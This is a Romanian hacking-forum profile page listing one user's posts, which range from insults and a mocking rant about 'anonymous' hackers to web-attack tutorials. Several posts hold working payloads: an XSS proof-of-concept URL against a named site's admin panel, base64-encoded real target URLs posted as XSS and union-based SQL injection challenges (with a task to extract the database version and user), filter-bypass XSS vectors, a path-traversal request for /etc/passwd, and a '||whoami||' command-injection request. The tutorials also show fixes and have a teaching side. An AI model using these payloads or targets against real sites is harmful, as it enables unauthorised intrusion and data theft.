Jump to content

Corex

Active Members
  • Posts

    94
  • Joined

  • Last visited

Posts posted by Corex

  1. Cat timp ai fost inactiv puteai sa inveti ca atunci cand te referi la e i/ ele se scrie "s-au" , nu cand te referi la o alta posibila optiune "sau". Daca ai petrecut atat timp sa tastezi porcaria de mai sus, imi pare rau de tine. Nu-s vreun grammar nazzi, dar vrei sa pari destept cand emani numai prostie pura ( de la mama ei )

    Da-i lui Nytro un PM cu ceva child porn sa te baneze permanent, si scapai de griji.

    Citeste de mai multe ori pana intelegi ce am scris si la ce m-am refirit.

    Sa ii dau PM lu Nytro cu filme porno , asta este o cerinte de filme porno noi in direct s-au cum ? in fine nu ma priveste pe mine ! o seara placuta.

  2. Salut , am fost inactiv o buna perioada in care mi-am imbogatit cunostintele si studiind persoanele din jurul meu am constatat ca exista persoane proaste , si persoane extrem de proaste , ca sa deschid putin ochii utilizatorilor o sa descriu putin persoanele rau intentionate "anonymousii" din ziua de astazi.

    De regula acesti "anonymousi" stau foarte ascunsi de ochii nostri , ii gasim mereu pe skype / messenger cu statusuri de genul "Dau net cu lingurita fraierilor" si mereu o sa ii vezi cu nume gen: "Pustiu" "Doxu" "Renko" "SZR" cand ii vezi online cel mai inteligent ar fi sa dai tu logout !

    Dar daca esti in conferinta cu ei si fereasca Dumnezeu i-ai injurat dragi cititori am sa va spun ca o sa regretati toata viata deoarece acesti hackeri stiu injuraturi precum stiu preotii rugaciuni si este imposibil sa ii intreci s-au sa le dai un maxim.

    De obicei acesti "anonymousi" se "ard" intre ei de "root-uri" si sunt fericiti multe zile in sir daca au reusit sa te pice.

    Dupa ce ti-a "picat netul" nu fi surprins daca atunci cand intri o sa ii gasesti cu statusul "Lam pikat p fraer" nici gramatica nu este iertata de ei , si o reactualizeaza in limba lor.

    In timpul liber "anonymousii" stau cu ochii pe site-ul porntube.com (si ca sa ii oftice vine alt anonymous si da cu flood-ul in redtube si ii lasa pe ceilalti cu sagetica in mana si cu treaba neterminata)

    Lor le place foarte mult sa aiba foarte multe femei in jurul lor , asa de mult incat la nevoie si ei sunt fetite in cazul in care au nevoie de ceva de la alt cineva.

    Lor le place foarte mult sa "combine" fete si sa le dezbrace dupa care sa le santajeze (sau cei mai inteligenti sunt constienti ca au material de laba cateva luni bune cu pozele obtinute in 3 minute)

    Cei mai multi dintre ei au obtiune "change sex" din nastere deoarece vorbeste cu tine pe skype ca si baiat , si pe mess vorbeste cu gagigasu care evident are ceva ce domnul are nevoie.

    Cea mai mare pedeapsa care i-ar putea lovi ar fi sa se interzica filmele porno s-au sa nu mai aiba maini

    In fine nu ma priveste pe mine aceste doua aspecte din viata lor.

    Mai nou umbla in echipa si au foarte multi membri si daca te pui cu ei , te pui cu anonymous Romania

    Sincer sa fiu la cat am intalnit ar insemna ca 20% din populatia Romaniei care foloseste calculatorul si are abilitati de hacking sunt din "Anonymous"

    Iubitele lor sa nu credeti ca sunt doar niste simple fete care cauta atentie ci sunt niste spioni infiltrati de rivalii acestui anonymous cu urmatorul plan

    " se duce fata la el , il excita , si el cand se pregateste sa frece lampa noi ii picam netul asa fraierul o sa ramana cu niste coaie cat casa"

    Cam asta este nivelul lor de gandire si de logica.

    Mai sunt un fenomen pe internet noi o sa ii numim "team crackerasi" aceasta denumire am puso deoarece cunosc o comunitate foarte interesanta care ii nu o sa ii dau numele deoarece simpla accesare a site-ului respectiv va infectati cu prostie.

    Acesti indivizi ii mai putem numi "razbunarea tocilarilor" ataca des serverele de metin2 , si limba romana , daca incerci sa spui ceva ce nu stiu ei si tu esti as , or sa-ti spuna ca nu este adevarat si ca ei stiu ce este cu adevarat acel lucru , drept dovada am incercat si eu sa ma bag cu ei in seama sa ii intreb despre programare si mi-au raspuns ca urmatoarele linii nu sunt vulnerabile xss


    $x = $_GET['asd']
    echo $x;

    Deci de aici reiese ca hackerii nu au nevoie de asemenea informatii !

    Aceasta revolutie a tocilarilor se trage de la frustrarea stransa ca unii pot construi ceva , si ei nu.

    Asa ca toate armele lor sunt urmatoarele

    -Proxy-urile indetectabile

    -Root-urile de pe care dau flood

    -Canalele de MiRC

    -Colectia de conturi premium pe diverse site-uri de videochat / porno

    -Fetele care sunt oricand in prezenta lui cu textul "da-mi si mie un root"

    -Contul pe xat plin ochi cu ajutorul victimelor

    Pe langa acestea mereu acest hacker mai are si

    - Palmaresul lui cu servere de metin2 sparte

    - Palmaresul lui de Radiouri picate

    - Lista lui cu "fraeri" care i-ar fi picat in decursul timpului.

    Unul din susnumiti are numele pe internet "Huiu aka Mashat" haide sa il prezint in cate-va cuvinte pe acest domn.

    Este in actiune de cati-va ani , este respectat doar de copii de sub 15 ani si armata lui de elita sunt niste persoane de temut cu care nu ai vrea sa ai afaceri nici odata.

    Aici vorbim despre

    - DDoS2015

    - Cromas

    - PenTest

    - ScrY.dll

    - © FuNcKer

    - R00t1ng

    Acesti oameni sunt foarte buni cand vine vorba de "DDo$" si stiu cam toate filmele porno existente la momentul actual , si ultima lor gagica in realitate au avuto la gradinita.

    Viata lor sexuala merge foarte bine , din motivul acesta ei nu au tinut pasul cu ea.

    Au avut foarte multe relatii pe internet , din care putine relatii au fost cu fete.

    Nu invata sa faca sql injection s-au alte metode de exploatare deoarece exista programe care fac asta.

    Daca spargi 10.000 de siteuri intr-o zi si tu nu ai auzit nici odata de ele , atunci esti hacker roman.

  3. Eu am votat orange deoarece am avut o experienta destul de interesanta cu el

    Aveam semnal si in padure si la munte si cand treceam granita mai aveam semnal vro 20 minute este destul de ok si la preturi ... recomand orange cosmote si vodafone pica reteaua si la metrou in fine depinde si ce telefon folosesti am auzit ca telefoanele mai antice au semnalu mai bun daca pentru asta il vrei..

    Off zapp mai exista eu nu am vazut pe nicaieri cartele zapp in fine oare ce prefix or avea

    076

    078 cosmote

    072

    073 vodafone

    074

    075 orange

    071

    077 digi

    079 frog

    Nu inteleg ce prefix o avea zapp

  4. De unde maic? "raported" ? :))

    // Po?i s? a?tep?i mult ?i bine dup? r?spuns.

    Eu am zis sa fiu bun samaritean ... poate primesc ceva in schimb , si un HOF ar fi buni , dar vorba lui Cifre mai bine profitati voi de el

    http://www.probux.com//adminpanel/?username=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=

  5. On: Imi cer scuze staff-ului pentru ca fac offtopic dar nu ma pot abtine!

    OFF : Bai raton constipat ce tot comentezi aiurea la fiecare cuvant pe care il scriu ? Te

    simti "penetrat" de vorbele mele sau ce?Deci draga Durex sau cum te numesti eu zic sa nu mai intri pe RST ca nu e de tine , apuca-te de metin , cur-spurcat(cs) si alte rahaturi !

    In sfarsit ma simnt si eu bine si vine cineva sa imi strice dispozitia , nu stiu daca ai observat dar imi argumentez fiecare vorba care o scot pe gura , si ma gandesc la ea de 10 ori inainte , ceea ce in cazul tau nu este nevoie sa ma fi gandit prea mult deoarece se vede clar ce fel de persoana esti tu.

    Daca vii pe privat si ma injuri nu rezolvi nimic , totul este sa fii pe bune pe cel care este pe bune cu tine !

    Te-ai enervat ca ti-am dat replay la o chestie unde te-ai demigrat tu singur in ochii mei cel putin , te-ai luat de bietul baiat degeaba , el s-a prezentat nu stiu daca este dreptul vostru sa va luati de el ... de ce ati faceo ? in fine nu mai comentez absolut nimic deoarece mereu cand vad asemenea oameni ma doare burta ! si nu ca sunt constipat cum spuneai tu , si nu ca sunt "raton" doar ca sunt socat de comportamentul vostru si cum puteti voi sa ganditi o problema injurand si "urand" toata lumea nu este cea mai buna obtiune pe care o puteai aborda.

    Mediteaza la ce ti-am scris eu aici si ai sa observi ca nu sunt asa de "raton" cum spuneai tu

  6. Target:

    aHR0cDovL3doaXRlLWhhY2tlcnMuY29tL2NoYWxsYW5nZS94c3MtY2hhbGxhbmdlLWhhcmQucGhw

    Prof: 4eYqdK6.png

    Difficulty: Hard

    Ruls: Fara HINT-uri , postati o poza cu alerta si astept pe PM vectorul folosit de voi.

    Castigatori

    1) Renegade

    2) valcea55

    3) florin_darck

    4) danyweb09

    5) whitec0der

  7. Cuvant inainte

    Initiatorul proiectului este Reckon cu site-ul lui pentest-academy.com

    Dupa ce s-a inchis site-ul lui a facut publice scripturile si am spus sa il redeschid eu din nou

    Nu a publicat partea de XSS deci a trebuit sa o refac eu de la 0 desi inca nu este in totalitate gata m-am gandit

    Ca este folositor si cat am lucrat si sa o updatez pe parcurs ce termin cate un nivel nou.

    Ce etape trebuie sa treci la SQL injection

    La SQL injection aveti 4 nivele de cursuri cu 4 examene

    Dupa fiecare lectie terminata aveti cate un examen ,

    la terminarea examenului veti fi trecuti in HOF la categoria unde ati absolvit examenul

    Ce etape trebuie sa treci la Cross Site Scripting

    La Cross Site Scripting tot aveti 4 etape deocam data nu avem examene

    Dar le voi adauga pe parcurs , aici veti invata metode de a trece de Filtre

    Cum ar arata codul in spate si cum se recunoaste un XSS

    CURSURI SQL INJECTION

    SQL INJECTION NIVEL 1 UNION BASED

    SQL INJECTION NIVEL 2 ERROR BASED

    SQL INJECTION NIVEL 3 DOUBLE QUERY

    SQL INJECTION NIVEL 4 XPATH INJECTION

    CURSURI XSS (CROSS SITE SCRIPTING)

    XSS (CROSS SITE SCRIPTING) LEVEL 1

    XSS (CROSS SITE SCRIPTING) LEVEL 2

    XSS (CROSS SITE SCRIPTING) LEVEL 3

    XSS (CROSS SITE SCRIPTING) LEVEL 4

    ©©©©©©©©©©©©©©©©©©©©©©©©©©

    ©©©Proiect realizat de Reckon & Corex©©©©©©

    ©©©©©©©©©©©©©©©©©©©©©©©©©©

    • Downvote 1
  8. In acest tutorial va voi arata 4 tipuri de bypasuri XSS si cam cum arata scriptul in spate.

    Sa inepem !

    Fara Filtru.

    Varianta fara filtru nu prea iti da batai de cap deoarece se introduce direct vectorul <script>alert(/xss/)</script>

    Cum apare acest tip de xss? Pur si simplu afiseaza toate informatiile care sunt trecute prin GET

    codu din spate arata cam asa


    <?php
    $functie =($_GET ['xss']);
    echo ("$functie ")
    ?>

    Ca sa afisezi alerta XSS vei face asa

    www.white-hackers.com/xss1.php?xss=<script>alert(2)</script>

    Bypass basic folosinduse de filtrul str_replace()

    Aceasta functie cauta un sir specificat (in cazul nostru) <script> si il modifica (in cazul nostru NULL)

    Haide sa vedeti si cum arata codu sursa pentru acest tip de XSS


    <?php
    echo 'Rezultat '.str_replace('script', null, $_GET['xss']);
    ?>

    Ca sa treci de acest filtru trebuie sa folosim un bypass (este foarte usor)

    www.white-hackers.com/xss2.php?xss=<ScRiPt>alert(2)</ScRiPt>

    XSS Filtru htmlentities()

    htmlentities converteste toate functiile din HTML . Intr-un cuvant toate tagurile din HTML le traduce in HTML (nu afecteaza codul sursa)

    Scriptul din spate o sa arate cam asa


    <?php
    echo "<img alt='' src='".htmlentities($_GET['xss'])."' />";
    ?>

    Ca sa trecem de acest filtru trebuie sa continuam scriptul dar sa includem alerta

    acest lucru se va face cam asa

    www.white-hackers.com/xss3.php?xss=.' onerror='alert("XSS")

    Filtru folosinduse de data URLs

    Aceasta metoda este putin mai ciudata deoarece practic vom folosi datele URL care in cele mai multe cazuri sunt folosite pentru imagini pentru a le pastra ca si text intr-un HTML

    Haide sa vedem cum arata codul sursa


    <?php
    echo '<object data="'.htmlspecialchars($_GET['xss']).'"></object>';
    ?>

    Ca sa afisam alerta XSS trebuie sa ne folosim de data:text/html;base64

    iar dupa vom cripta in base64 vectorul <script>alert(2)</script>

    Deci va arata cam asa

    www.white-hackers.com/xss4.php?xss=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=

    • Upvote 1
  9. Target:

    aHR0cDovL3d3dy5tb3JlYW5hcnRzY2VudGVyLm9yZy9uZXdzLnBocD9pZD0yODA1

    Method: Union based

    ---------------------------------------------------------------

    Instructions:

    -Extrage (versiune , user db , database)

    -Numele de pe forum sa fie scri cu verde

    -Nu dati HINTURI

    -Rezolvarea se trimite pe PM

    ---------------------------------------------------------------

    Prof:

    T581gu5.png

    |--------------------------------------------------------------|

    |Castigatori

    |--------------------------------------------------------------|

    |-endru

    |-whitec0der

    |-Renegade

    |-AsalT

    |-Sensi

    |--------------------------------------------------------------|

  10. Wow, mersi pentru tutorial. Îmi par cunoscute câteva exemple. Oare de ce? Ah, da, pentru ca eu l-am scris acum 5 ani. Bine, nu eu am scris c?catul asta, tu doar ai copiat exemplele ?i tips-urile.

    http://exploit-db.com/papers/12871

    Pe lâng? ca mi-ai copiat exemplele, ai tradus prost, ai mai ?i introdus gre?eli în el. Dac? te ui?i atent po?i sa îmi vezi numele în câteva exemple. :-))

    Penibil.

    Doar cateva exemple nu tot :) si nu de acolo le-am luat.

  11. Te lauzi intr-un stil retardat de parca ai impresia ca nimeni nu-si da seama de ce incerci sa faci.

    ...

    Nu, iti plac aia care doar se cred.

    "Nu imi plac decat..." sau "Imi plac doar...". Nu mai vorbi precum tiganii.

    ---

    Hai sa te aduc un pic cu picoarele pe pamant, Shelo. Esti un nimeni, ai fost un nimeni si, in ritmul asta, vei fi un nimeni. Pune mana si invata ceva, citeste o carte pe orice subiect, doar ca sa mai capeti cunostinte de orice fel, si cel mai probabil iti vei schimba si mentalitatea. In momentul asta esti un copil laudaros care are impresia ca stie ceva cand nu stie nimic. Trei piese dintr-un puzzle de o mie te fac sa pari inteligent in fata a cinci oameni, daca asta e scopul tau, sa fii inteligent in ochii celor mai idioti ca tine, ti l-ai indeplinit deja si te poti si opri, eventual sa mergi sa-ti faci si tu forumul tau. Daca vrei sa devii serios, termina cu laudele astea de cacat si cu foamea de atentie "by any means".

    Se pare ca gresesti ..

  12. Salutare RST , sunt corex si chiar daca sunt inregistrat de mai mult timp pe aici "nesimtit" fiind din fire am uitat sa ma prezint.

    Numele meu il stiu decat prietenii deci nu cred ca ar avea rost sa il fac si public.

    Pasionat de informatica de cam 2 ani , pus pe treaba de cam 4 luni nu pot sa spun ca sunt prea stralucit in acest domeniu dar evoluez pe zi ce trece.

    Am mai avut un cont inainte pe aici dar am fost banat mai bine sa nu stiti cine am fost :)

    Am intrat pe aceasta comunitate din sete de informatii si stiind ca aici este un mediu a programatorilor acesta este si visul meu daca ii pot spune asa sa fiu cel mai bun programator din viata mea

    Pe principiu daca vad pe cineva mai bun ca mine sa il depasesc (sunt luptator din fire)

    De obicei sunt tacut , nu vorbesc mult si prost cum fac altii pe aici (cel putin din cati am cunoscut.)

    Imi displac oamenii care imi trimit pm-uri gen (cum se face sql injection) stau si ii explic cu ce se mananca dupa care primesc pm (imi faci tu syntaxa te rog ca mie nu imi iese)

    Imi plac oamenii care sunt pusi pe treaba si ce nu stiu invata singuri (daca iti dai interesul in ceva o sa reusesti)

    Imi displac oamenii care injura mult (credeti ca rezolvati ceva daca injurati?)

    Dar imi plac oamenii care sunt calculati si respecta pe cei care iau respectat

    Nu imi plac oamenii care spun ca sunt hackeri

    Imi plac oamenii care demonstreaza acest lucru

    Nu imi plac oamenii

    Imi doar femeile

    Bine v-am gasit

  13. In tutorialul de astazi o sa va vorbesc de cele mai populare vulnerabilitati si exploatarea acestora.

    1) XSS (Cross Site Scripting)

    2) SQLI (SQL Injection)

    3) SCD (Source Code Disclosure)

    4) LFI (Local File Inclusion)

    5) RCE (Remote Code Execution)

    1) XSS (Cross Site Scripting)

    Cross site scripting este o vulnerabilitate prin care permite atacatorului sa injecteze coduri HTML / Javascript

    Majoritatea atacurile de acest tip tintesc cookie-urile.

    -Cum sa imi dau seama ca este vorba de un XSS?

    Testarea "parametrului" vulnerabil se face cu un vector de obicei se foloseste un vector cu o alerta

    JavaScript

    ex:

    "><script>alert(2)</script>

    Cate tipuri de XSS-uri exista?

    Dupa cate stiu eu sunt doua tipuri de XSS

    Persistent: sau XSS reflectat care este vulnerabil pe acel parametru dar nu salveaza datele nicaieri

    Si "victima" trebuie sa acceseze linkul creat de tine cu Graber

    Nepersistent: Acest tip afecteaza toti utilzatorii site-ului deoarece vectorul de xss ramane imprimat in sursa paginii

    - De ce apare aceasta vulnerabilitate?

    Aceasta vulnerabilitate apare din cauza ca nu sunt filtrate inforatiile are le afiseaza.

    Intr-un cuvant le afiseaza direct in codul sursa

    exemplu:


    <?php
    <?php
    if(isset($_GET['vulnerabil'])) {
    $var=$_GET['vulnerabil'];
    print $var;
    }
    ?>
    ?>

    Acest script este vulnerabil la XSS! Cum ii facem testul ?

    Foarte simplu , sa spunem ca am creeat un fisier xss.php

    Si l-am urcat pe www.rstforums.com/xss.php

    Vom lucra pe parametru GET deci noi pe parametru GET am pus rstforums

    Intram asa

    rstforums.com/xss.php?rstforums=(vector)

    In realitate o sa arate exact asa

    rstforums.com/xss.php?rstforums=<script>alert(2)</script>

    Nu voi intra in detalii despre exploatare , acum o sa va dau si solutia de securizare a vulnerabilitatii acestea!

    In tutorialul nostru ne vom folosi de functia htmlentities din PHP pentru a ne proteja de acest atac.

    <?php
    echo htmlentities((stripslashes($_GET['text'])), ENT_QUOTES);
    ?>

    Ce face htmlentities? Pur si simplu converteste toate caracterele care se folosesc de aplicatia HTML / JAVASCRIPT

    Va las aici si un link cu fel de fel de vectori care ii puteti folosi

    XSS Vector Collection - Pastebin.com

    2) SQLI (SQL Injection)

    Sql injection este o vulnerabilitate care afecteaza in mare parte serverele MYSQL al paginii respective

    Cum iti dai seama ca un site este vulnerabil la SQL Injection

    Gasirea vulnerabilitatii cand este vorba de SQLI la site-uri

    In primul rand se testeaza cu ' daca va fi returnata o eroare de exemplu

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND publ_option = 'Y' LIMIT 0, 1' at line 1

    atunci fiti siguri ca va confruntati cu o vulnerabilitate de tip SQL injection

    Metodele de exploatare cele mai intalnite sunt

    -Union based

    -error based

    -double query

    -Time Based

    -PostGree

    -Cum apare vulnerabilitatea SQL Injection?

    Sa zicem ca avem urmatorul script

     
    <?php
    mysql_connect("localhost","user","password");
    mysql_select_db("db");

    $informatii=($_GET['id']);
    $int=mysql_query("SELECT * FROM post WHERE postid='".$informatii."'");
    ?>

    Scriptul cauta in baza de date in functie de un anumit ID , pe care utilizatorul il trimite prin GET catre server.

    - Cum se repara aceasta vulnerabilitate?

    Protejarea site-ului dumneavoastra de aceasta vulnerabilitate se face cu functia mysql_real_escape_string

    Deci scriptul dumneavoastra va arata cam asa

     
    <?php
    mysql_connect("localhost","user","password");
    mysql_select_db("db");

    $informatii=mysql_real_escape_string($_GET['id']);
    $int=mysql_query("SELECT * FROM post WHERE postid='".$informatii."'");
    ?>

    3. SCD (Source Code Disclosure)

    SCD-ul este o vulnerabilitate mai periculoasa decat SQL injection deoarece aceasta vulnerabilitate iti permite sa descarci sau sa vezi codul sursa a unei pagini (Partea de PHP)

    De cele mai multe ori atacatorul urmareste informatii sensibile care ii aduce accessul site-ului respectiv.

    -Cum se testeaza daca parametru este vulnerabil la SCD

    In majoritatea cazurilor SCD-ul este gasit in paginile de download.

    exemplu avem urmatorul link

    www.site.com/download.php?carte=ioncreanga.pdf

    Dupa download.php?carte= puneti index.php

    Aici sunt doua posiblitati.

    Ori il descarca

    Ori apare in codu sursa a paginii.

    4) LFI (Local File Inclusion)

    Cu ajutorul acestei vulnerabilitati atacatorul poate include anumite fisiere critice in server sau poate fi transformat cu success intr-un SCD

    - Cum se creaza vulnerabilitatea ?

    Avem urmatorul exemplu

    $file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['file'];
    header("Pragma: public");
    header("Expires: 0");
    header("Cache-Control: must-revalidate, post-check=0, pre-check=0");

    header("Content-Type: application/force-download");
    header( "Content-Disposition: attachment; filename=".basename($file));

    //header( "Content-Description: File Transfer");
    @readfile($file);
    die();

    Variabila “file” nu este securizata.Putem observa in prima linie ca este ceruta prin metoda $_REQUEST.Si continutul fisierului este afisat prin intermediul functiei readfile().Deci putem vedea continutul unui fisier arbitrar. Daca facem urmatoarea cerere :

    http://site/download.php?file=../../../../../../etc/passwd

    putem citii cu succes fisierul “etc/passwd”.

    - Cum se securizeaza?

    Metoda simpla : Nu permite caractere speciale in variabile.Filtreaza “.” .

    Alta metoda : Filtreaza “/” , “\” si “.” .

    5) RCE (Remote Code Execution)

    RCE dupa mine este cea mai periculoasa vulnerabilitate web din cate exista si totusi printre cele mai rare

    deoarece aceasta vulnerabilitate permite executarea codurilor de tip PHP

    Cum apare aceasta vulnerabilitate?

    Avem exemplu

    $status = $_GET['status'];
    $ns = $_GET['ns'];
    $host = $_GET['host'];
    $query_type = $_GET['query_type']; // ANY, MX, A , etc.
    $ip = $_SERVER['REMOTE_ADDR'];
    $self = $_SERVER['PHP_SELF'];
    ........................ etc ........................
    $host = trim($host);
    $host = strtolower($host);
    echo("<span class=\"plainBlue\"><b>Executing : <u>dig @$ns $host $query_type</u></b><br>");
    echo '<pre>';
    system ("dig @$ns $host $query_type");

    Variabila “ns” nu este filtrata si atacatorul poate specifica orice valoare.Un atacator poate folosi orice comanda prin intermediul acestei variabile.Sa facem o cerere :

    http://127.0.0.1/dig.php?ns=whoam&host=sirgod.net&query_type=NS&status=digging

    Injectia nu va functiona.De ce?Comanda executata va fi “dig whoami sirgod.com NS” si nu va functiona desigur.Sa incercam in alt fel.Avem operatorul OR (||) si il vom folosi pentru a “separa” comenzile.Exemplu :

    http://127.0.0.1/dig.php?ns=||whoami||&host=sirgod.net&query_type=NS&status=digging

    Comanda noastra va fi executata.Comanda va devenii “dig ||whoami|| sirgod.net NS” .

    Cum se securizeaza?

    Utilizati functiile escapeshellarg() si escapeshellcmd() .

    Cam asta a fost tot daca gasiti in tutorial greseli tehnice / gramatice trimiteti-mi PM cu ele.

    Sursa la o bucata de tutorial

    https://www.worldit.info/articole/gasirea-vulnerabilitatilor-in-scripturi-php-si-rezolvarea-acestora/

×
×
  • Create New...